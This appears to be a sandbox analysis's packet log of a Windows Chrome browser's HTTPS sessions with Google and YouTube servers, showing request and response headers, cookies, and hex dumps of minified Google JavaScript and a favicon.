                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 19-Apr-2024 01:59:17 GMT; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                      Set-Cookie: YSC=jRQWsnrOSN4; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Set-Cookie: VISITOR_INFO1_LIVE=uxbWyiEqJyc; Domain=.youtube.com; Expires=Wed, 16-Oct-2024 01:29:17 GMT; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D; Domain=.youtube.com; Expires=Wed, 16-Oct-2024 01:29:17 GMT; Path=/; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.549753108.177.122.1014432956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1347OUTGET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1
                                                                                                                                                                                                                                      Host: accounts.youtube.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://accounts.google.com
                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://accounts.google.com
                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FKHODHBz1iKQ6GXZWIj_Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport/allowlist
                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:22 GMT
                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      reporting-endpoints: default="/_/AccountsDomainCookiesCheckConnectionHttp/web-reports?context=eJzjUtDikmJw15BikPj6kkkLiJ3SZ7CGAHHSv_OsJUAsxMPxaWL7RjaBhr-_fjABAHiAEoQ"
                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 37 36 39 37 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 46 4b 48 4f 44 48 42 7a 31 69 4b 51 36 47 58 5a 57 49 6a 5f 4e 77 22 3e 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 22 75 6e 64 65
                                                                                                                                                                                                                                      Data Ascii: 7697<html><head><script nonce="FKHODHBz1iKQ6GXZWIj_Nw">"use strict";this.default_AccountsDomaincookiesCheckconnectionJs=this.default_AccountsDomaincookiesCheckconnectionJs||{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){("unde
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 22 3d 3d 3d 61 29 7b 69 66 28 69 61 28 29 29 69 66 28 28 61 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 62 29 29 26 26 61 5b 31 5d 29 62 3d 61 5b 31 5d 3b 65 6c 73 65 7b 61 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 62 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 62 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 62 29 2c 0a 22 37 2e 30 22 3d 3d 63 5b 31 5d 29 69 66 28 62 26 26 62 5b 31 5d 29 73 77 69 74 63 68 28 62 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 61 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 61 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30
                                                                                                                                                                                                                                      Data Ascii: ernet Explorer"===a){if(ia())if((a=/rv: *([\d\.]*)/.exec(b))&&a[1])b=a[1];else{a="";var c=/MSIE +([\d\.]+)/.exec(b);if(c&&c[1])if(b=/Trident\/(\d.\d)/.exec(b),"7.0"==c[1])if(b&&b[1])switch(b[1]){case "4.0":a="8.0";break;case "5.0":a="9.0";break;case "6.0
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 64 3d 41 28 61 29 3b 69 66 28 64 26 31 29 72 65 74 75 72 6e 21 30 3b 69 66 28 21 28 62 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 62 29 3f 62 2e 69 6e 63 6c 75 64 65 73 28 63 29 3a 62 2e 68 61 73 28 63 29 29 29 29 72 65 74 75 72 6e 21 31 3b 41 61 28 61 2c 64 7c 31 29 3b 72 65 74 75 72 6e 21 30 7d 2c 42 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 72 72 6f 72 28 22 69 6e 74 33 32 22 29 3b 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72 72 6f 72 5f 5f 63 6f 6e 74 65 78 74 5f 5f 39 38 34 33 38 32 7c 7c 28 61 2e 5f 5f 63 6c 6f 73 75 72 65 5f 5f 65 72
                                                                                                                                                                                                                                      Data Ascii: },B=function(a,b,c){if(!Array.isArray(a)||a.length)return!1;var d=A(a);if(d&1)return!0;if(!(b&&(Array.isArray(b)?b.includes(c):b.has(c))))return!1;Aa(a,d|1);return!0},Ba=function(){var a=Error("int32");a.__closure__error__context__984382||(a.__closure__er
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 61 2c 62 2c 63 2c 64 2c 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 0a 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 61 3d 42 28 61 2c 76 6f 69 64 20 30 2c 30 29 3f 76 6f 69 64 20 30 3a 65 26 26 41 28 61 29 26 32 3f 61 3a 49 61 28 61 2c 62 2c 63 2c 76 6f 69 64 20 30 21 3d 3d 64 2c 65 29 3b 65 6c 73 65 20 69 66 28 7a 61 28 61 29 29 7b 76 61 72 20 66 3d 7b 7d 2c 68 3b 66 6f 72 28 68 20 69 6e 20 61 29 66 5b 68 5d 3d 4a 61 28 61 5b 68 5d 2c 62 2c 63 2c 64 2c 65 29 3b 61 3d 66 7d 65 6c 73 65 20 61 3d 62 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 7d 2c 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 66 3d 64 7c 7c 63 3f 41 28 61 29 3a 30 3b 64 3d 64 3f 21 21 28 66 26 33 32 29 3a 76 6f 69 64 20 30 3b 61 3d 41 72
                                                                                                                                                                                                                                      Data Ascii: a,b,c,d,e){if(null!=a){if(Array.isArray(a))a=B(a,void 0,0)?void 0:e&&A(a)&2?a:Ia(a,b,c,void 0!==d,e);else if(za(a)){var f={},h;for(h in a)f[h]=Ja(a[h],b,c,d,e);a=f}else a=b(a,d);return a}},Ia=function(a,b,c,d,e){var f=d||c?A(a):0;d=d?!!(f&32):void 0;a=Ar
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 68 7d 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 7d 3b 76 61 72 20 63 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 31 45 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3e 3e 3e 30 29 2b 22 5f 22 2c 64 3d 30 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 62 22 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 63 2b 28 66 7c 7c 22 22 29 2b 22 5f 22 2b 64 2b 2b 2c 66 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 45 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72
                                                                                                                                                                                                                                      Data Ascii: e:!0,writable:!0,value:h})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e});E("Symbol.iterator
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 63 74 2e 69 73 45 78 74 65 6e 73 69 62 6c 65 28 6d 29 26 26 64 28 6d 29 3b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6b 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6d 3d 6e 65 77 20 61 28 5b 5b 6b 2c 32 5d 2c 5b 6c 2c 33 5d 5d 29 3b 69 66 28 32 21 3d 6d 2e 67 65 74 28 6b 29 7c 7c 33 21 3d 6d 2e 67 65 74 28 6c 29 29 72 65 74 75 72 6e 21 31 3b 6d 2e 64 65 6c 65 74 65 28 6b 29 3b 6d 2e 73 65 74 28 6c 2c 34 29 3b 72 65 74 75 72 6e 21 6d 2e 68 61 73 28 6b 29 26 26 34 3d 3d 6d 2e 67 65 74 28 6c 29 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 21 31
                                                                                                                                                                                                                                      Data Ascii: ct.isExtensible(m)&&d(m);return l(m)})}if(function(){if(!a||!Object.seal)return!1;try{var k=Object.seal({}),l=Object.seal({}),m=new a([[k,2],[l,3]]);if(2!=m.get(k)||3!=m.get(l))return!1;m.delete(k);m.set(l,4);return!m.has(k)&&4==m.get(l)}catch(r){return!1
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 65 61 64 3d 0a 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 75 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 67 29 2e 6c 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 28 67 3d 64 28 74 68 69 73 2c 67 29 2e 6c 29 26 26 67 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74
                                                                                                                                                                                                                                      Data Ascii: ead=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].u=f();this.size=0};c.prototype.has=function(g){return!!d(this,g).l};c.prototype.get=function(g){return(g=d(this,g).l)&&g.value};c.prototype.entries=function(){return e(t
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 63 29 7b 72 65 74 75 72 6e 20 62 3d 3d 3d 63 3f 30 21 3d 3d 62 7c 7c 31 2f 62 3d 3d 3d 31 2f 63 3a 62 21 3d 3d 62 26 26 63 21 3d 3d 63 7d 7d 29 3b 45 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 3b 63 3d 63 7c 7c 30 3b 66 6f 72 28 30 3e 63 26 26 28 63 3d 4d 61 74 68 2e 6d 61 78 28 63 2b 65 2c 30 29 29 3b 63 3c 65 3b 63 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 63 5d 3b 69 66 28 66 3d 3d 3d 62 7c 7c 4f 62 6a 65 63 74 2e 69 73 28 66 2c 62
                                                                                                                                                                                                                                      Data Ascii: c){return b===c?0!==b||1/b===1/c:b!==b&&c!==c}});E("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));var e=d.length;c=c||0;for(0>c&&(c=Math.max(c+e,0));c<e;c++){var f=d[c];if(f===b||Object.is(f,b
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 76 61 72 20 22 2b 61 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 64 3b 61 2e 6c 65 6e 67 74 68 26 26 28 64 3d 61 2e 73 68 69 66 74 28 29 29 3b 29 61 2e 6c 65 6e 67 74 68 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 63 5b 64 5d 26 26 63 5b 64 5d 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 5b 64 5d 3f 63 3d 63 5b 64 5d 3a 63 3d 63 5b 64 5d 3d 7b 7d 3a 63 5b 64 5d 3d 62 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 63 2e 70 72 6f 74 6f 74 79 70 65 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 41 3d 62 2e 70 72 6f 74 6f 74 79 70 65 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 63 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 61 3b 61 2e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 64
                                                                                                                                                                                                                                      Data Ascii: var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b},I=function(a,b){function c(){}c.prototype=b.prototype;a.A=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.ea=function(d
                                                                                                                                                                                                                                      2024-04-19 01:29:22 UTC1850INData Raw: 61 6d 65 3a 61 2e 66 69 6c 65 4e 61 6d 65 2c 73 74 61 63 6b 3a 62 7d 3a 28 63 3d 61 2e 6d 65 73 73 61 67 65 2c 6e 75 6c 6c 3d 3d 63 26 26 28 63 3d 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 3f 27 55 6e 6b 6e 6f 77 6e 20 45 72 72 6f 72 20 6f 66 20 74 79 70 65 20 22 27 2b 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3f 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3a 74 62 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 29 2b 27 22 27 3a 22 55 6e 6b 6e 6f 77 6e 20 45 72 72 6f 72 20 6f 66 20 75 6e 6b 6e 6f 77 6e 20 74 79 70 65 22 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2e 74 6f 53 74 72 69 6e 67 26 26 4f 62 6a 65 63
                                                                                                                                                                                                                                      Data Ascii: ame:a.fileName,stack:b}:(c=a.message,null==c&&(c=a.constructor&&a.constructor instanceof Function?'Unknown Error of type "'+(a.constructor.name?a.constructor.name:tb(a.constructor))+'"':"Unknown Error of unknown type","function"===typeof a.toString&&Objec


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.549742142.250.9.994432956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC1025OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC707INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                      Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                      Content-Length: 5430
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Date: Fri, 12 Apr 2024 15:00:22 GMT
                                                                                                                                                                                                                                      Expires: Sat, 20 Apr 2024 15:00:22 GMT
                                                                                                                                                                                                                                      Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                      Age: 556142
                                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC548INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                      Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                                                                                                      2024-04-19 01:29:24 UTC1255INData Raw: ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b
                                                                                                                                                                                                                                      Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C;
